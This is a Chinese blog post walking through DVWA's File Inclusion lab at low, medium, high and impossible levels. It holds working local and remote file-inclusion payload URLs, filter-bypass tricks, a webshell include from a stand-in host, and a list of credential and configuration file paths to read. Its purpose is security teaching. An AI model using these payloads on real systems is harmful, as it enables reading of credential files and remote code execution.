DVWA-05-File Inclusion

最新推荐文章于 2024-08-02 22:16:19 发布
最新推荐文章于 2024-08-02 22:16:19 发布
阅读量147 收藏
点赞数
分类专栏: DVWA 文章标签: mysql 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43198291/article/details/114142302
版权

目录

1.概念

File Inclusion(文件包含漏洞)

条件

文件包含函数

四种函数的区别

漏洞产生原因

分类

常见敏感信息路径

2.实验

2.1 LOW

2.2 Medium

2.3High

2.4 impossible

1.概念

File Inclusion(文件包含漏洞)

服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码。

条件

php.ini 中 allow_url_include=ON

文件包含函数

  • require()     
  • require_once()
  • include()
  • include_once()

四种函数的区别

  • require函数在出现错误后,会直接报错并退出程序的执行。
  • include函数在出现错误后,会抛出警告,程序正常执行。
  • 而require_once,include_once与requie和include的不同是,只包含文件一次,确保文件只被包括一次以避免函数重定义,变量重新赋值等等。

漏洞产生原因

文件包含函数中的参数没有经过过滤或者严格的定义,可以被普通用户控制。

分类

  • 本地文件包含漏洞

      本地文件包含可以查看本地敏感文件

      可以配合文件上传漏洞执行webshell

  • 远程文件包含漏洞

      开启了:allow_url_fopen=on  在php.ini中

      远程文件包含一般是用于包含远程主机上的恶意代码文件实现攻击,例如如果存在远程文件包含:

      使用http://www.dvwa.com/test.php?page=http://www.hack.com/webshell,访问那么http://www.hack.com/webshell.php的代码就会被执行。

常见敏感信息路径

  1. Windows系统

       c:\boot.ini // 查看系统版本

       c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件

       c:\windows\repair\sam // 存储Windows系统初次安装的密码

       c:\ProgramFiles\mysql\my.ini // MySQL配置

       c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码

       c:\windows\php.ini // php 配置信息

  • Linux/Unix系统

       /etc/passwd // 账户信息

      /etc/shadow // 账户密码文件

      /usr/local/app/apache2/conf/httpd.conf                      // Apache2默认配置文件

     /usr/local/app/apache2/conf/extra/httpd-vhost.conf    // 虚拟网站配置

     /etc/php/7.4/apache2/php.ini   // PHP相关配置

     /etc/httpd/conf/httpd.conf  或  /etc/apache2/apache2.conf    // Apache配置文件

     /etc/my.conf // mysql 配置文件

2.实验

2.1 LOW

 

先看代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

服务器端对page参数没有做任何的过滤跟检查,其目的是点击下面的三个链接,服务器会包含相应的文件,并将结果返回。

只要文件内容符合PHP代码语法规范,那么任何扩展名都可以被php解析,非php语法规范,则会原封不动地打印文件内容,所以文件包含漏洞常常会导致任意文件读取与任意命令执行。

 

漏洞复现

本地文件包含

通过构造url内容,在page后加入文件路径就可以读取

远程文件包含

因为我们已经开启了allow_url_fopen以及allow_url_include,所以这里也可以执行远程文件包含

我们在另一台服务器上部署phpinfo文件

vim phpinfo.txt

内容

<?php phpinfo() ?>

访问http://192.168.31.51/DVWA/vulnerabilities/fi/?page=http://192.168.31.23/phpinfo.txt

 

2.2 Medium

查看源码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

Medim级别的比Low级别的多了srt_replace()函数做参数处理,将”http:// ”、”https://”、 ” ../”、”..\”替换为了空字符。

使用srt_replace函数可以使用双写绕过替换

  • http://可以使用hthttp://tp://这种方式绕过
  • ../可以用....// 或者..././这种方式绕过

1.本地文件包含

http://192.168.31.51/DVWA/vulnerabilities/fi/?page=..././..././..././..././..././..././..././..././..././..././etc/php/7.4/apache2/php.ini

2.远程文件包含

http://192.168.31.51/DVWA/vulnerabilities/fi/?page=hthttp://tp://192.168.31.23/phpinfo.txt

2.3High

看代码先

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?> 
fnmatch(pattern,string,flags):根据指定的模式来匹配文件名或字符串。
pattern必需。规定要检索的模式。
string必需。规定要检查的字符串或文件。
flags可选。

file://伪协议 (读取文件内容),通过file协议可以访问本地文件系统,读取到文件的内容

本地包含

http://192.168.31.51/DVWA/vulnerabilities/fi/?page=file:///etc/passwd

远程包含,暂时不能使用

2.4 impossible

查看代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

使用了白名单机制进行防护,规定了参数,此时文件包含漏洞就暂时不存在了。

Asiaforest
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-master.zip
08-22
DVWA的"File Inclusion"部分,你可以学习如何检测和修复这类问题。 5. **命令注入**:当应用程序使用不受信任的输入来构建操作系统命令时,攻击者可能执行任意系统命令。"Command Injection"章节提供了一个实践...
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版.zip
02-03
3. **文件包含漏洞**:DVWA的"File Inclusion"模块让用户了解文件包含漏洞的危害。通过不当的动态文件包含,攻击者可能能读取服务器上的任意文件,甚至执行系统命令。 4. **弱认证与会话管理**:DVWA的...
mysql配置文件教程_Mysql配置文件:my.ini详解 - MySQL 教程精选
weixin_34669783的博客
01-28 118
(1)、back_log:要求 MySQL 能有的连接数量。当主要MySQL线程在一个很短时间内得到非常多的连接求,这就起作用,然后主线程花些时间(尽管很短)检查连接并且启动一个新线程。back_log值指出在MySQL暂时停止回答新求之前的短时间内多少个求可以被存在堆栈中。只有如果期望在一个短时间内有很多连接,你需要增加它,换句话说,这值对到来的TCP/IP连接的侦听队列的大小。你的操作系...
Dvwa漏洞之 local file inclusion 本地文件包含
小雨的博客
04-10 3519
local file inclusion运行攻击者读取同一台服务器上的认可文件 访问www目录外的文件 如果用户账号密码保存在某个文件里,就可以读了,这个是很危险的 如果多个网站部署在一台服务器上,通过a网站的此漏洞,就可以访问B网站的文件,从而进一步实施攻击 ...
DVWA-文件包含(File Inclusion
weixin_58954236的博客
08-19 375
文件包含:开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含。文件包含漏洞:开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。文件包含是利用函数来包含web目录以外的文件,分为本地包含和远程包含。
DVWA-File Inclusion(文件包含)
qq_45751902的博客
04-25 323
目录简介安全级别:Low本地文件包含远程文件包含安全级别:Medium安全级别:High安全级别:Impossible防护总结:参考 简介 1.文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含; 2. 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞;在PHP中经常出现文件包含漏洞; 3.php中引发文件包含漏洞的通常是以下四个函数 inc
DVWA--File Upload+DVWA--File Inclusion
weixin_51075988的博客
01-30 164
DVWAFile Upload Low 查看源码 就是简单的修改文件路径至…/…/hackable/uploads/ ,但是并未对文件进行任何过滤,那么我们试试上传一句话木马吧! 上传成功 使用工具 中国蚁剑 Medium 查看源码 限制了文件类型只能是jpg与png格式 我们可以先上传正确格式的,然后通过Bp抓包修改格式发送出去即可。 High 查看源码 strrpos(string,find,start)函数: string 必需。规定被搜索的字符串 find 必需。规定要查找的字符 sta
DVWA-File Inclusion
06-02 552
这里主要总结一下远程文件包含漏洞,PHP的解析机制:PHP的 include、require、include_once 和 require_once 函数会将指定文件的内容读入当前的执行流,并将其视为PHP代码来解析和执行。文件的扩展名并不重要,重要的是文件内容是否包含有效的PHP代码远程文件包含需要1.DVWA网站参数设置为allow_url_include = on(是否允许 include/require 远程文件)allow_url_fopen = on(是否允许打开远程文件
DVWA-File Inclusion文件包含)
Cwillchris的博客
10-28 2286
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: FileInclusion,意思是文件包含(漏洞),是指当服务器开启 allow_url_include选项时,就可以通过php的某些特性函数(include(), require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。.
dvwa-04-File inclusion
qq_53755216的博客
03-05 71
文件包含 继续dvwa学习 low 当招不到文件时回报错 然后显示一些有用的信息 比如原文件所在的包 可以包含本地文件 注: 文件包含时,不管包含的文件是什么类型,都会优先尝试当作php文件执行,如果文件内容有php代码,则会执行php代码并返回代码执行的结果,如果文件内容没有php代码,则把文件内容打印出来 当我们把1.txt改一下时 <?php phpinfo(); ?> 可以通过这种方式进行渗透 比如用weevely 直接放个webshell进去 但是这种攻击仅限于本地
DVWA--File Inclusion(文件包含)(全难度)
wwxxee
02-20 270
DVWAFile Inclusion(文件包含) 原理参考:网络安全笔记-99-渗透-文件包含 逻辑 page参数的值不同,包含的文件不同。 难度分级 Low 核心代码 分析: 该级别没有对参数进行任何过滤。 利用 包含本地文件: http://192.168.17.141/DVWA/vulnerabilities/fi/?page=C:\Windows\System32\drivers\etc\hosts 本地文件包含目录穿越: http://192.168.17.141/DVWA/vulnera
MySQL:行级锁
最新发布
Zachyy的博客
08-02 436
MySQL中的行级锁是数据库锁机制中粒度最细的一种,它只锁定事务需要修改的数据行,而不是整个表或数据库。行级锁能够显著提高数据库的并发性能,减少锁冲突。
MySQL:初识数据库&初识SQL&建库
2401_83595513的博客
07-31 935
MySQL&数据库服务&数据库&SQL
Mysql重大更新,三个版本遭下架!
xiaofan23z的专栏
07-24 1121
个时就会触发这个重大bug,7/23日mysql发布重要更新,发布了如下三个版本。书接上,7/11日开源数据库软件服务商percona发布重要警告,最新的。后面官方确认,确实存在重大bug,但是不是表超过10000个,而是超过。当mysql表超过10000张时重启可能会崩溃。
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 512
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 490
本示例使用@ohos.security.cryptoFramework相关接口实现了对文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 270
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
鸿蒙系统开发【ASN.1密转换】安全
2301_76813281的博客
08-02 311
本示例对使用@kit.CryptoArchitectureKit加密后的密格式进行转换。@kit.CryptoArchitectureKit加密后的密格式默认为以base64显示的ASN.1格式问题,通过对密进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密格式转换,从ASN.1格式转换为c1c3c2格式的裸密,再以c1c3c2格式的裸密进行解密,以验证密转换的正确性。
dvwa file inclusionfile upload
05-12
其中包括文件包含(File Inclusion)和文件上传(File Upload)两种漏洞。 文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值